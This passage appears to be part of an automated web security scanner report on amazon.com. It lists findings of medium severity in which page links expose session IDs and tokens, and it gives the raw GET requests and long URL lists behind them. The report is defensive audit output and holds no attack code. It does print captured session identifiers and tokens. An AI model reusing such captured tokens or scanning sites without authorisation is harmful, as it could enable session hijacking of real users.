</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2A7F22C631B7AE7AAF20BE088CD2B5B7F134EAF8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8AF62AB7ACDE502E7743675297CFF93F69261AA8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5683F405FDA36D090ADA5C068BA632D753C9B956&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.69. http://www.amazon.com/b/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/b/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/189-7332499-5529366?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846

Request

GET /b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.70. http://www.amazon.com/dp/0313363153 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0313363153

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_BJTpnb1EQ5KVK?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_fa_dp_BJTpnb1EQ5KVK%26bodytext%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by%2520Christina%2520M.%2520Dalpiaz
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_BJTpnb1EQ5KVK?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0313363153%252Fref%253Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FC82A74D1E62C7EA36EE314FA3F6368A848BDBBD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5150085B47183668122EAFCC27ECE5F23DE669B5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5B840721150D35FE87BEE378FEECF1DC012D8847&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Inappropriate.Reviews&voteSessionID=188-3368164-3583051

Request

GET /dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.71. http://www.amazon.com/dp/0814410960 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0814410960

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_RITpnb019NC4P?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_fa_dp_RITpnb019NC4P%26bodytext%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_RITpnb019NC4P?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0814410960%252Fref%253Dcm_sw_r_tw_dp_RITpnb019NC4P%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_tw_dp_RITpnb019NC4P%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=113496E24FD421A11E316AD1E459851B2F5E7309&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BAACC80F3B8910F625943593F11186D745F3C0A9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=03C344605DE37626CB4960BA9773574E491143FA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=55639B32FEBD11A47FD73EF98DE173CFF439110D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF9191EBAA35DB9C8C5C45CB19E1874118BDC838&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AAE52732137D56F7486FA32E3865DB5CFF649D3E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4889AC1ECD1E8DE3F6A180C1B5C8D1789FD9463E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3ED15F6A6D485DF4ADAA3D8D7958D55E1FED8EAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7DD5CA7DBBFEDFE0C103F968D22A046D3A241B76&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218

Request

GET /dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.72. http://www.amazon.com/dp/B000EFAO1G previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B000EFAO1G

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_1?ie=UTF8&quantity.1=1&asin.1=B000EMRT2Q&offeringID.1=7jcq51LAg6i14P%252F7j%252Bkijz2%252FhwpXMqgFsJtRpW6D5jiJizPY%252BzRcfvxN7286dP5kL38WX4nD%252FKQc9OGM6eOytmrssA1jD8nY8Eov4tfDtxs%253D&action=addToCart&session-id=191-2655627-9808834
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_2?ie=UTF8&quantity.1=1&asin.1=B000EG4614&offeringID.1=%252F0siBAHrjRmSUMbYbFkOPPJ%252FmQcBG%252FCzPlKHaKwvU8Bn3du1H1CMyLxZZ6IkGyXlsoMFMh8iZLo6HtNFS4c7uhk7yZsW87DzVNzsBMGR56U%253D&action=addToCart&session-id=191-2655627-9808834
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_3?ie=UTF8&quantity.1=1&asin.1=B000C3U9II&offeringID.1=uz4LC9uODEANYmCS2BLmumflXP%252BA9jav0LyJFZWjtblFTk6t%252B57BiGsNK56pLSDZos8iX6canx7%252FdrDoCOHtpM8gOQvl5soAsDR64PzWvQg%253D&action=addToCart&session-id=191-2655627-9808834
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_sg_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B000EFAO1G&offeringID.1=4ySNZgakPd3BAo2i0BeY8RYqU%252BGOvdceafD49r5xM8uLA9aHFfkaggJZ%252BhhfC9OoOIGLAnX6QWhS1occmcjYko0IOXtSrFEuB5q2eh13y5Q%253D&action=addToCart&session-id=191-2655627-9808834
http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=GTgJL3KUmyFqvnHULLAj%252FhWk173a%252BMiXJUK2MbmeXUgx2t9ECo62OedEENdvmIYKvNj44VhweK715aN2KtPFtWtL%252Fnn%252FoIctW9%252B8dwhuNDCXptyY3CsDr68NTifca%252FqczhfXOt9RXCw%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834
http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=adHPCzl%252Fz0nRwfx10WS%252Bc7exJR2icuaHyjmC1DAu%252Bn6HOyULH%252BE16FXRAwsGCaY0qUwY4GNmKwyag1pYgINIqhOL0AjMyL26OcsDl9rZfW8wGXrzjDdkSFmoCs9y8e7x2QL5XGS8Dmxe0w8g4iNbqQ%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834
http://www.amazon.com/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EF76A88233722F79F2BE14EA125B3E4220402566&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AEDB9FA1F3AC9E736846DE84F12A5A9C8BC44BCB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C91EB2221487561A30D06874DDE2B3D4919A3B3B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=042DBD34F7B8D4936967EFF2468A191965D10C62&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=304FCF9B2857ABA16716F0B4D0717989AA818AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
